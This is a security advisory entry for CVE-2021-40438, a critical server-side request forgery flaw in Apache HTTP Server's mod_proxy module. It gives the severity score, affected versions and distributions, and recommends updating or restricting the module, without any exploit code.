PT-2021-1392 · Apache+9 · Apache Http Server+9
The Apache
·
Published
2021-09-16
·
Updated
2026-03-10
·
CVE-2021-40438
CVSS v3.1
9.0
Critical
| Vector | AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H |
Name of the Vulnerable Software and Affected Versions:
Apache HTTP Server versions 2.4.48 and earlier
Description:
A crafted request uri-path can cause mod proxy to forward the request to an origin server chosen by the remote user. This issue is related to insufficient validation of incoming requests, allowing a remote attacker to perform a Server-Side Request Forgery (SSRF) attack. The estimated number of potentially affected devices worldwide is not specified. There are reports of real-world incidents where this issue was exploited.
Recommendations:
For Apache HTTP Server versions 2.4.48 and earlier, update to a version that includes the fix for this issue. As a temporary workaround, consider restricting access to the mod proxy module to minimize the risk of exploitation. Avoid using vulnerable configurations that allow an attacker to manipulate the request uri-path until the issue is resolved.
Exploit
Fix
SSRF
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Alt Linux
Almalinux
Apache Http Server
Astra Linux
Centos
Linuxmint
Red Hat
Rocky Linux
Suse
Ubuntu